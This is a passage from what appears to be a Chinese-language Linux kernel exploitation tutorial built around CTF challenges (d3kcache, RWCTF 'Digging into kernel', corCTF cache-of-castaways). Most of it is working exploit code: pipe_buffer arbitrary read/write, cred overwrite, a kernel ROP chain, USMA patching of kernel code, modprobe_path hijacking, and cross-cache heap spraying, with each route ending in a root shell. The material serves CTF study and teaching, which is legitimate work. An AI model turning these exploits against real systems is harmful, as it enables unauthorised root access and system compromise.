    close(pipe_fd[orig_pipe_id[0]][0]);
    close(pipe_fd[orig_pipe_id[0]][1]);

    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pipe_id[0] || i == victim_pip_id[0]) {
            continue;
        }
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0) {
            perror("[-] failed to extend pipe.");
            exit(-1);
        }
    }

    read(pipe_fd[victim_pip_id[0]][0], buf, SND_PIPE_BUF_SZ - 6 - sizeof(int));
    read(pipe_fd[victim_pip_id[0]][0], &info_pipe_buf, sizeof(info_pipe_buf));

    qword_dump("leak pipe_buffer", &info_pipe_buf, sizeof(info_pipe_buf));
    kernel_offset = (size_t) info_pipe_buf.ops - 0xffffffff82451b30;
    printf("[+] kernel offset: %p\n", kernel_offset);

    puts("[*] construct a second-level uaf pipe page...");
    write(pipe_fd[victim_pip_id[0]][1], &info_pipe_buf, sizeof(info_pipe_buf));

    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        int nr;
        if (i == orig_pipe_id[0] || i == victim_pip_id[0]) {
            continue;
        }
        read(pipe_fd[i][0], &nr, sizeof(nr));
        if (nr >= 0 && nr < PIPE_SPRAY_NUM && i != nr) {
            orig_pipe_id[1] = nr;
            victim_pip_id[1] = i;
            printf("[+] find second-level victim: %d, orig: %d.\n", victim_pip_id[1], orig_pipe_id[1]);
        }
    }
    if (victim_pip_id[1] == -1) {
        puts("[-] failed to corrupt second-level pipe_buffer.");
        exit(-1);
    }

    size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
    write(pipe_fd[victim_pip_id[1]][1], buf, sizeof(info_pipe_buf) - 6 - 8 * sizeof(int));

    puts("[*] free second-level original pipe...");
    close(pipe_fd[orig_pipe_id[1]][0]);
    close(pipe_fd[orig_pipe_id[1]][1]);

    puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pipe_id[0] || i == orig_pipe_id[1] || i == victim_pip_id[0] || i == victim_pip_id[1]) {
            continue;
        }
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0) {
            perror("[-] failed to extend pipe.");
            exit(-1);
        }
    }

    for (int i = 0; i < 3; i++) {
        puts("[*] hijacking pipe_buffer on page to itself...");
        memcpy(&evil_pipe_buf[i], &info_pipe_buf, sizeof(info_pipe_buf));
        evil_pipe_buf[i].offset = TRD_PIPE_BUF_SZ;
        evil_pipe_buf[i].len = TRD_PIPE_BUF_SZ;
        write(pipe_fd[victim_pip_id[1]][1], buf, TRD_PIPE_BUF_SZ - sizeof(info_pipe_buf));
        write(pipe_fd[victim_pip_id[1]][1], &evil_pipe_buf[i], sizeof(info_pipe_buf));

        for (int j = 0; j < PIPE_SPRAY_NUM; j++) {
            if (j == orig_pipe_id[0] || j == orig_pipe_id[1] || j == victim_pip_id[0] || j == victim_pip_id[1]) {
                continue;
            }
            bool flag = false;
            for (int k = 0; k < i; k++) {
                if (j == evil_pipe_id[k]) {
                    flag = true;
                    break;
                }
            }
            if (flag) {
                continue;
            }
            struct page *page_ptr;
            read(pipe_fd[j][0], &page_ptr, sizeof(page_ptr));
            if (page_ptr == info_pipe_buf.page) {
                evil_pipe_id[i] = j;
                printf("[+] find self-writing pipe: %d\n", evil_pipe_id[i]);
            }
        }
        if (evil_pipe_id[i] == -1) {
            puts("[-] failed to build self-writing pipe.");
            exit(-1);
        }
    }

    evil_pipe_buf[1].offset = TRD_PIPE_BUF_SZ * 3;
    evil_pipe_buf[1].len = 0;
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[1], sizeof(info_pipe_buf));

    evil_pipe_buf[2].offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf[2].len = 0;

    vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
    while (true) {
        arbitrary_read_by_pipe((void *) vmemmap_base + 0x9d000 / 0x1000 * 0x40, buf);
        if (kernel_offset + 0xFFFFFFFF81000070 == buf[0]) {
            printf("[+] find secondary_startup_64: %p\n", buf[0]);
            break;
        }
        vmemmap_base -= 0x10000000;
    }
    printf("[+] vmemmap_base: %p\n", vmemmap_base);

    puts("[*] seeking task_struct in memory...");
    prctl(PR_SET_NAME, "1145141919810");
    for (int i = 0;; i++) {
        ssize_t len = arbitrary_read_by_pipe((void *) vmemmap_base + i * 0x40, buf);
        size_t *comm = memmem(buf, len, "1145141919810", 13);
        if (comm && is_dir_mapping_addr(comm[-2])
            && is_dir_mapping_addr(comm[-57])
            && is_dir_mapping_addr(comm[-56])) {
            current_task = comm[-50] - 2528;
            page_offset_base = (comm[-50] & 0xfffffffffffff000) - i * 0x1000;
            page_offset_base &= 0xfffffffff0000000;
            printf("[+] find currtent task_struct: %p\n", current_task);
            printf("[+] page_offset_base: %p\n", page_offset_base);
            break;
        }
    }
}

void privilege_escalation_by_task_overwrite() {
    /* finding the init_task, the final parent of every task */
    puts("[*] Seeking for init_task...");
    size_t init_cred;
    size_t task = current_task;
    while (true) {
        arbitrary_read_by_pipe(direct_map_addr_to_page_addr(task), buf);
        arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(task) + 0x40, &buf[0x1000 / 8]);
        if ((buf[((task & 0xFFF) + 0x998) / 8] & 0xFFFFFFFF) == 0) {
            init_cred = buf[((task & 0xFFF) + 0xB60) / 8];
            printf("[+] find init_cred: %p\n", init_cred);
            break;
        }
        task = buf[((task & 0xFFF) + 0x8D0) / 8] - 0x8D0;
    }

    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(current_task), buf);
    arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(current_task) + 0x40, &buf[0x1000 / 8]);
    buf[((current_task & 0xFFF) + 0xB58) / 8] = init_cred;
    buf[((current_task & 0xFFF) + 0xB60) / 8] = init_cred;
    arbitrary_write_by_pipe(direct_map_addr_to_page_addr(current_task), buf, 0xff0);
    arbitrary_write_by_pipe((void *) direct_map_addr_to_page_addr(current_task) + 0x40, &buf[0x1000 / 8], 0xff0);
    system("/bin/sh");
}

size_t stack_addr, pgd_addr;

void pgd_vaddr_init() {
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(current_task), buf);
    arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(current_task) + 0x40, &buf[0x1000 / 8]);
    stack_addr = buf[((current_task & 0xFFF) + 0x20) / 8];
    printf("[*] kernel stack addr: %p\n", stack_addr);
    size_t mm_struct_addr = buf[((current_task & 0xFFF) + 0x920) / 8];
    printf("[*] mm_struct addr: %p\n", mm_struct_addr);
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(mm_struct_addr), buf);
    arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(mm_struct_addr) + 0x40, &buf[0x1000 / 8]);
    pgd_addr = buf[((mm_struct_addr & 0xFFF) + 0x48) / 8];
    printf("[*] pgd addr: %p\n", pgd_addr);
}

#define PTE_OFFSET 12
#define PMD_OFFSET 21
#define PUD_OFFSET 30
#define PGD_OFFSET 39

#define PT_ENTRY_MASK 0b111111111UL
#define PTE_MASK (PT_ENTRY_MASK << PTE_OFFSET)
#define PMD_MASK (PT_ENTRY_MASK << PMD_OFFSET)
#define PUD_MASK (PT_ENTRY_MASK << PUD_OFFSET)
#define PGD_MASK (PT_ENTRY_MASK << PGD_OFFSET)

#define PTE_ENTRY(addr) ((addr >> PTE_OFFSET) & PT_ENTRY_MASK)
#define PMD_ENTRY(addr) ((addr >> PMD_OFFSET) & PT_ENTRY_MASK)
#define PUD_ENTRY(addr) ((addr >> PUD_OFFSET) & PT_ENTRY_MASK)
#define PGD_ENTRY(addr) ((addr >> PGD_OFFSET) & PT_ENTRY_MASK)

#define PAGE_RW (1ULL << 1)
#define PAGE_NX (1ULL << 63)

size_t vaddr_to_paddr_for_4_level(size_t vaddr) {
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pgd_addr), buf);
    size_t pud_vaddr = ((buf[PGD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pud_vaddr), buf);
    size_t pmd_vaddr = ((buf[PUD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pmd_vaddr), buf);
    size_t pte_vaddr = ((buf[PMD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pte_vaddr), buf);
    return ((buf[PTE_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) | (vaddr & 0xFFF);
}

size_t vaddr_to_paddr_for_3_level(size_t vaddr) {
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pgd_addr), buf);
    size_t pud_vaddr = ((buf[PGD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pud_vaddr), buf);
    size_t pmd_vaddr = ((buf[PUD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pmd_vaddr), buf);
    return ((buf[PMD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) | (vaddr & 0x1FFFFF);
}

void vaddr_remapping(size_t vaddr, size_t paddr) {
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pgd_addr), buf);
    size_t pud_vaddr = ((buf[PGD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pud_vaddr), buf);
    size_t pmd_vaddr = ((buf[PUD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pmd_vaddr), buf);
    size_t pte_vaddr = ((buf[PMD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pte_vaddr), buf);
    buf[PTE_ENTRY(vaddr)] = (paddr & (~0xFFF)) | 0x8000000000000867;/* mark it writable */
    arbitrary_write_by_pipe(direct_map_addr_to_page_addr(pte_vaddr), buf, 0xff0);
}

void get_shell(void) {
    char *args[] = {"/bin/sh", "-i", NULL};
    execve(args[0], args, NULL);
}

void privilege_escalation_by_rop() {
    pgd_vaddr_init();
    stack_addr = vaddr_to_paddr_for_4_level(stack_addr) + page_offset_base;
    printf("[*] stack addr on direct mapping space: %p\n", stack_addr);
    save_status();
    size_t ret = 0xffffffff8107af08 + kernel_offset;
    size_t pop_rdi_ret = 0xffffffff818710dd + kernel_offset;
    size_t init_cred = 0xFFFFFFFF83079EE8 + kernel_offset;
    size_t commit_creds = 0xFFFFFFFF811284E0 + kernel_offset;
    size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF82201A90 + kernel_offset;
    size_t *rop = buf;
    for (int i = 0; i < ((0x1000 - 0x100) / 8); i++) { *rop++ = ret; }
    *rop++ = pop_rdi_ret;
    *rop++ = init_cred;
    *rop++ = commit_creds;
    *rop++ = swapgs_restore_regs_and_return_to_usermode + 0x36;
    rop++;
    rop++;
    *rop++ = (size_t) get_shell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;
    puts("[*] hijacking current task's stack...");
    arbitrary_write_by_pipe(direct_map_addr_to_page_addr(stack_addr + 0x1000 * 3), buf, 0xff0);
}

void privilege_escalation_by_usma() {
    pgd_vaddr_init();
    size_t ns_capable_setid_vaddr = 0xFFFFFFFF810FD2A0 + kernel_offset;
    printf("[*] ns_capable_setid vaddr: %p\n", ns_capable_setid_vaddr);
    size_t ns_capable_setid_paddr = vaddr_to_paddr_for_3_level(ns_capable_setid_vaddr);
    printf("[*] ns_capable_setid vaddr in dir map: %p\n", ns_capable_setid_paddr + page_offset_base);
    size_t ns_capable_setid_page_paddr = ns_capable_setid_paddr & ~0xFFF;
    char *code_mmap = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    memset(code_mmap, 0, 0x2000);
    vaddr_remapping((size_t) code_mmap, ns_capable_setid_page_paddr);
    vaddr_remapping((size_t) code_mmap + 0x1000, ns_capable_setid_page_paddr + 0x1000);
    sleep(1);
    byte_dump("code_mmap", code_mmap + (ns_capable_setid_paddr & 0xFFF), 0x100);
    uint8_t shellcode[] = {0x48, 0xc7, 0xc0, 0x1, 0x0, 0x0, 0x0, 0xc3};
    memcpy(code_mmap + (ns_capable_setid_paddr & 0xFFF), shellcode, sizeof(shellcode));
    setresuid(0, 0, 0);
    system("/bin/sh");
}


int main(int argc, char **argv, char **envp) {
    bind_core(true, false);

    kcache_fd = open("/dev/d3kcache", O_RDWR);
    if (kcache_fd < 0) {
        perror("[-] failed to open d3kcache.🤔");
        exit(-1);
    }

    self_write_pipe_init();

    if (argv[1] && !strcmp(argv[1], "rop")) {
        privilege_escalation_by_rop();
    } else if (argv[1] && !strcmp(argv[1], "usma")) {
        privilege_escalation_by_usma();
    } else {
        privilege_escalation_by_task_overwrite();
    }

    return 0;
}

Arbitrary Address Allocation

通过 uaf 修改 object 的 free list 指针实现任意地址分配。与 glibc 不同的是，内核的 slub 堆管理器缺少检查，因此对要分配的目标地址要求不高，不过有一点需要注意：当我们分配到目标地址时会把目标地址前 8 字节的数据会被写入 freelist，而这通常并非一个有效的地址，从而导致 kernel panic，因此在任意地址分配时最好确保目标 object 的 free list 字段为 NULL 。

当能够任意地址分配的时候，与 glibc 改 hook 类似，在内核中通常修改的是 modprobe_path 。modpath_path 是内核中的一个变量，其值为 /sbin/modprobe ，因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。

当我们尝试去执行（execve）一个非法的文件（file magic not found），内核会经历如下调用链：

entry_SYSCALL_64()
    sys_execve()
        do_execve()
            do_execveat_common()
                bprm_execve()
                    exec_binprm()
                        search_binary_handler()
                            __request_module() // wrapped as request_module
                                call_modprobe()

其中 call_modprobe() 定义于 kernel/kmod.c，我们主要关注这部分代码：

static int call_modprobe(char *module_name, int wait)
{
	//...
	argv[0] = modprobe_path;
	argv[1] = "-q";
	argv[2] = "--";
	argv[3] = module_name;	/* check free_modprobe_argv() */
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
					 NULL, free_modprobe_argv, NULL);
	if (!info)
		goto free_module_name;

	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
	//...

在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。
我们不难想到的是：若是我们能够劫持 modprobe_path，将其改写为我们指定的恶意脚本的路径，随后我们再执行一个非法文件，内核将会以 root 权限执行我们的恶意脚本。

例题：RWCTF2022高校赛 - Digging into kernel 1 & 2

附件下载链接
xkmod_init 创建了一个名为 lalala 的 kmem_cache 。分配大小为 192 ，不过由于没有设置 SLAB_ACCOUNT 因此会和 kmalloc-192 合并，这里我们按照 SLAB_ACCOUNT 设置的情况来做。

int __cdecl xkmod_init()
{
  __int64 v0; // rsi
  kmem_cache *v1; // rax

  printk((char *)&byte_1E4, v0);
  misc_register(&xkmod_device);
  v1 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
  buf = 0LL;
  s = v1;
  return 0;
}

xkmod_ioctl 有读，写，分配三个功能，其中分配是从 xkmod_init 创建的 kmem_cache 中分配。

void __fastcall xkmod_ioctl(__int64 a1, int op, char *a3)
{
  void *p_input; // rdi
  char *v5; // rsi
  Input input; // [rsp+0h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+10h] [rbp-10h]

  v7 = __readgsqword(0x28u);
  if ( a3 )
  {
    p_input = &input;
    v5 = a3;
    copy_from_user(&input, a3, 16LL);
    if ( op == 0x6666666 )
    {
      p_input = buf;
      if ( buf && input.size <= 0x50u && input.index <= 0x70u )
      {
        copy_from_user(&buf[input.index], input.buf, input.size);
        return;
      }
    }
    else
    {
      if ( op != 0x7777777 )
      {
        if ( op == 0x1111111 )
          buf = (char *)kmem_cache_alloc(s, 0xCC0LL);
        return;
      }
      v5 = buf;
      if ( buf && input.size <= 0x50u && input.index <= 0x70u )
      {
        copy_to_user(input.buf, &buf[input.index], input.size);
        return;
      }
    }
    xkmod_ioctl_cold((__int64)p_input, (__int64)v5);
  }
}

xkmod_release 是驱动自定义的 release 函数，在调用 close 关闭句柄时会调用，显然我们可以关闭多个句柄来实现 double free 。

int __fastcall xkmod_release(inode *inode, file *file)
{
  return kmem_cache_free(s, buf);
}

关于内核基址获取，在内核“堆基址”（page_offset_base） + 0x9d000 处存放着 secondary_startup_64 函数的地址，而我们可以从 free object 的 next 指针获得一个堆上地址，从而去猜测堆的基址，之后分配到一个堆基址 + 0x9d000 处的 object 以泄露内核基址，这个地址前面刚好有一片为 NULL 的区域方便我们分配。

#define __PAGE_OFFSET           page_offset_base
#define PAGE_OFFSET		((unsigned long)__PAGE_OFFSET)
#define __va(x)			((void *)((unsigned long)(x)+PAGE_OFFSET))

	/* Must be perfomed *after* relocation. */
	trampoline_header = (struct trampoline_header *)
		__va(real_mode_header->trampoline_header);
	...
	trampoline_header->start = (u64) secondary_startup_64;

至于 page_offset_base 可以通过 object 上的 free list 泄露的堆地址与上 0xFFFFFFFFF0000000 获取。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

size_t modprobe_path = 0xFFFFFFFF82444700;

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

void bind_core(int core) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

struct Data {
    size_t *buf;
    u_int32_t offset;
    u_int32_t size;
};

void alloc_buf(int fd, struct Data *data) {
    ioctl(fd, 0x1111111, data);
}

void write_buf(int fd, struct Data *data) {
    ioctl(fd, 0x6666666, data);
}

void read_buf(int fd, struct Data *data) {
    ioctl(fd, 0x7777777, data);
}

int main() {
    bind_core(0);

    int xkmod_fd[5];
    for (int i = 0; i < 5; i++) {
        xkmod_fd[i] = open("/dev/xkmod", O_RDONLY);
        if (xkmod_fd[i] < 0) {
            printf("[-] %d Failed to open xkmod.", i);
            exit(-1);
        }
    }

    struct Data data = {malloc(0x1000), 0, 0x50};
    alloc_buf(xkmod_fd[0], &data);
    close(xkmod_fd[0]);

    read_buf(xkmod_fd[1], &data);
    qword_dump("buf", data.buf, 0x50);

    size_t page_offset_base = data.buf[0] & 0xFFFFFFFFF0000000;
    printf("[+] page_offset_base: %p\n", page_offset_base);

    data.buf[0] = page_offset_base + 0x9d000 - 0x10;
    write_buf(xkmod_fd[1], &data);
    alloc_buf(xkmod_fd[1], &data);
    alloc_buf(xkmod_fd[1], &data);

    data.size = 0x50;
    read_buf(xkmod_fd[1], &data);
    qword_dump("buf", data.buf, 0x50);
    
    size_t kernel_offset = data.buf[2] - 0xffffffff81000030;
    printf("kernel offset: %p\n", kernel_offset);
    modprobe_path += kernel_offset;

    close(xkmod_fd[1]);
    data.buf[0] = modprobe_path - 0x10;
    write_buf(xkmod_fd[2], &data);
    alloc_buf(xkmod_fd[2], &data);
    alloc_buf(xkmod_fd[2], &data);
    strcpy((char *) &data.buf[2], "/home/shell.sh");
    write_buf(xkmod_fd[2], &data);

    if (open("/home/shell.sh", O_RDWR) < 0) {
        system("echo '#!/bin/sh' >> /home/shell.sh");
        system("echo 'chmod 777 /flag' >> /home/shell.sh");
        system("chmod +x /home/shell.sh");
    }
    system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
    system("chmod +x /home/fake");
    system("/home/fake");
    if (open("/flag", O_RDWR) < 0) {
        puts("[-] Failed to hijack!");
        _exit(-1);
    }
    puts("[+] hijack success");
    system("/bin/sh");

    return 0;
}

Arbitrary Address Free（Only Heap Address）

在内核利用的时候有时想通过修改一个 A 结构体的某个指针指向 B 结构体然后释放 A 结构体来释放 B 结构体从而实现 B 结构体的 UAF 。然而有时候劫持 B 结构体进行 UAF 的 C 结构体改不到 B 结构体的关键字段，这时后可以考虑把 A 结构体的指针改到 B 结构体地址减某个偏移的地方，这样 C 结构体的可控部分能够覆盖 B 结构体需修改的区域。

分析 kfree 源码可知 kmem_cache 是通过 object 所在 page 获取的。

void kfree(const void *x)
{
	struct page *page;
	void *object = (void *)x;

	trace_kfree(_RET_IP_, x);

	if (unlikely(ZERO_OR_NULL_PTR(x)))
		return;

	page = virt_to_head_page(x);
	if (unlikely(!PageSlab(page))) {
		BUG_ON(!PageCompound(page));
		kfree_hook(object);
		__free_pages(page, compound_order(page));
		return;
	}
	slab_free(page->slab_cache, page, object, NULL, 1, _RET_IP_);
}

之后又如下调用链：

1
2
3

kfree()
    slab_free()
        do_slab_free()

在 do_slab_free 中几乎没做检查，直接将该 object 链入到 freelist 上。因此可以进行堆上任意地址 free 。

if (likely(page == c->page)) {
	set_freepointer(s, tail_obj, c->freelist);

	if (unlikely(!this_cpu_cmpxchg_double(
			s->cpu_slab->freelist, s->cpu_slab->tid,
			c->freelist, tid,
			head, next_tid(tid)))) {

		note_cmpxchg_failure("slab_free", s, tid);
		goto redo;
	}
	stat(s, FREE_FASTPATH);
}

Kernel Unlink

区别于用户态的 unlink 攻击，kernel unlink 主要作用是借助 unlink 的指针互写操作来实现任意地址写数据。

unlink 基于 list_del 操作。伪造两个地址来替代 list_head ，这样其中一个地址就会被写到另一个地址上。如果我们能够控制 prev / next 指针，可以把 prev 指针设置为 modprobe_path ，这样就会在 [2] 处将 next 值写入 prev 指向的内存。

问题：[1] 处，prev 会写往 next->prev，这意味着 next 也必须是一个有效的指针，这限制了我们能写往 prev 的值。解决办法是，利用 physmap 提供一个有效的 prev 值。

static inline void __list_del(struct list_head * prev, struct list_head * next)
{
	next->prev = prev; 				// [1]
	WRITE_ONCE(prev->next, next); 	// [2]
}

physmap 是一块内核虚拟内存，物理内存页连续映射到该处。例如，如果机器有 4G 内存（2^32 字节），需用 32 bit 来索引物理内存；假设 physmap 起始地址是 0xffffffff00000000，则 0xffffffff00000000~0xffffffffffffffff 范围内的值都有效。因此，若系统有 4G 内存（实际要求一般比这个低很多），攻击者可以控制 prev 的低 4 字节，只要高 4 字节表示 physmap 地址即可。

由于我们目标是修改 modprobe_path ，可以构造 next = 0xffffxxxx2f706d74（系统内存至少有 0x2f706d7c 字节，大概 760M），若 prev = modprobe_path + 1，利用 [2] 将 modprobe_path 覆写为 /tmp/xxxxprobe （其中 xxxx 是 prev 的高4字节）。后面即可提权。

1	removexattr("suffix name", XATTR_DELETION_NAME)

simple_xattr

以 simple_xattr 结构体为例（所有有链表解链操作的结构体都可以），该结构体定义如下，可以看到该结构体中有一个 list 成员。

struct simple_xattr {
    struct list_head list;
    char *name;
    size_t size;
    char value[];
};

struct list_head {
	struct list_head *next, *prev;
};

因此我们可以修改 simple_xattr 来实现 unlink 攻击。但是该技术需要知道哪个 simple_xattr 对象被覆盖了，否则随意移除 item 会导致遍历 list 时报错（如果移除的正常的 simple_xattr 与异常的 simple_xattr 相邻会将异常的 simple_xattr 链入双向链表中）。

识别被覆盖的 simple_xattr 对象有如下方法：

如果修改 simple_xattr 的同时我们还能够读取 simple_xattr 那么我们可以在创建 simple_xattr 时通过设置 value 的值（setxattr 的 value 参数）来确定被覆盖的 simple_xattr 对象。
可以分配长度 0x100 字节的 name（setxattr 的 name 参数）那么 simple_xattr ->name 指针的最低 1 字节为 0 。此时我们在覆盖 simple_xattr 的 list_head 的同时还顺便将 simple_xattr ->name 的最低 1 字节覆盖使得 name 指向原来 name 中间某个位置，这样我们就能确定被覆盖的 simple_xattr 对应的 name 。

Page-level Heap Fengshui

Cross-Cache Overflow 实际上是针对 buddy system 的利用手法。

当 freelist page 已经耗空且 partial 链表也为空时（或者 kmem_cache 刚刚创建后进行第一次分配时），其会向 buddy system 申请页面：

buddy system 基本原理就是以 2 的 order 次幂张内存页作为分配粒度，相同 order 间空闲页面构成双向链表，当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半，其中一半挂回当前请求 order 链表，另一半返还给上层调用者；下图为以 order 2 为例的 buddy system 页面分配基本原理：

我们不难想到的是：从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的，由此我们可以：

向 buddy system 请求两份连续的内存页
释放其中一份内存页，在 vulnerable kmem_cache 上堆喷，让其取走这份内存页
释放另一份内存页，在 victim kmem_cache 上堆喷，让其取走这份内存页

此时我们便有可能溢出到其他的内核结构体上，从而完成 cross-cache overflow

注意 slub 申请的 object 位于线性映射区，因此溢出修改的是物理地址相邻的内存页。而 buddy system 的特性可以保证两个物理页物理地址相邻。

在实际情况中我们无法准确控制 buddy system ，因此这一步骤改为：

向 buddy system 请求大量的内存页
释放其中一半内存页，在 vulnerable kmem_cache 上堆喷，让其取走这些内存页
释放另一半内存页，在 victim kmem_cache 上堆喷，让其取走这些内存页

这样我们有很大概率构造出上面那种情况，从而可以溢出到其他的内核结构体上完成 cross-cache overflow 。

例题：corCTF2022 - cache-of-castaways

附件下载链接
init_module 创建了一个 kmem_cache，分配的 object 的 size 为 512，创建 flag 为 SLAB_ACCOUNT | SLAB_PANIC，同时开启了 CONFIG_MEMCG_KMEM=y，这意味着这是一个**独立的 kmem_cache**：

void init_module()
{
  castaway_dev = 0xFF;
  qword_8A8 = (__int64)"castaway";
  qword_8B0 = (__int64)&castaway_fops;
  _mutex_init(&castaway_lock, "&castaway_lock", &_key_28999);
  if ( !(unsigned int)misc_register(&castaway_dev) )
  {
    castaway_arr = (char **)kmem_cache_alloc(kmalloc_caches[12], 0xDC0LL);
    if ( castaway_arr )
    {
      castaway_cachep = kmem_cache_create("castaway_cache", 512LL, 1LL, 0x4040000LL, 0LL);
      if ( castaway_cachep )
        init_castaway_driver_cold();
    }
  }
}

castaway_edit 存在 6 字节溢出。

void __fastcall castaway_edit(unsigned __int64 index, size_t size, __int64 buf)
{
  char src[512]; // [rsp+0h] [rbp-220h] BYREF
  unsigned __int64 v5; // [rsp+200h] [rbp-20h]

  v5 = __readgsqword(0x28u);
  if ( index > 0x18F
    || !castaway_arr[index]
    || size > 0x200
    || (_check_object_size(src, size, 0LL), copy_from_user(src, buf, size)) )
  {
    castaway_edit_cold();
  }
  else
  {
    memcpy(castaway_arr[index] + 6, src, size);
  }
}

由于 kmem_cache ， object 级别的利用不可用，因此考虑页级堆风水。

首先向 buddy system 请求大量的内存页。

/* make buddy's lower order clean, castaway_requesting from higher */
puts("[*] spraying pgv pages...");
for (int i = 0; i < PGV_PAGE_NUM; i++) {
    if (alloc_page(i, getpagesize(), 1) < 0) {
        printf("[x] failed at no.%d socket\n", i);
        err_exit("FAILED to spray pages via socket!");
    }
}

释放其中一半内存页，在 cred_jar 上堆喷，让其取走这些内存页。

/* free pages for cred */
puts("[*] freeing for cred pages...");
for (int i = 1; i < PGV_PAGE_NUM; i += 2) {
    free_page(i);
}

/* spray cred to get the isolate pages we released before */
puts("[*] spraying cred...");
pipe(check_root_pipe);
for (int i = 0; i < CRED_SPRAY_NUM; i++) {
    if (simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND, waiting_for_root_fn) < 0) {
        printf("[x] failed at cloning %d child\n", i);
        err_exit("FAILED to clone()!");
    }
}

由于 fork() 在执行过程中会产生很多的”噪声“（即额外分配一些我们不需要的结构体，从而影响页布局），因此这里我们改用 clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND) 。

下面的代码相当于 fork 了一个进程执行 waiting_for_root_fn 函数。

char child_pipe_buf[1];
int check_root_pipe[2];
char bin_sh_str[] = "/bin/sh";
char *shell_args[] = {bin_sh_str, NULL};
struct timespec timer = {
        .tv_sec = 100000000,
        .tv_nsec = 0,
};

int waiting_for_root_fn(void *args) {
    /* we're using the same stack for them, so we need to avoid cracking it.. */
    __asm__ volatile (
            "   lea rax, [check_root_pipe]; "
            "   mov edi, dword ptr [rax]; "
            "   mov rsi, child_pipe_buf; "
            "   mov edx, 1;   "
            "   xor eax, eax; " /* read(check_root_pipe[0], child_pipe_buf, 1)*/
            "   syscall;      "
            "   mov eax, 102; " /* getuid() */
            "   syscall; "
            "   cmp eax, 0; "
            "   jne failed; "
            "   lea rdi, [bin_sh_str];  "
            "   lea rsi, [shell_args];  "
            "   xor edx, edx;   "
            "   mov eax, 59;    "
            "   syscall;        "   /* execve("/bin/sh", args, NULL) */
            "failed: "
            "   lea rdi, [timer]; "
            "   xor esi, esi; "
            "   mov eax, 35; "  /* nanosleep() */
            "   syscall; "
            );

    return 0;
}

__attribute__((naked)) long simple_clone(int flags, int (*fn)(void *)) {
    /* for syscall, it's clone(flags, stack, ...) */
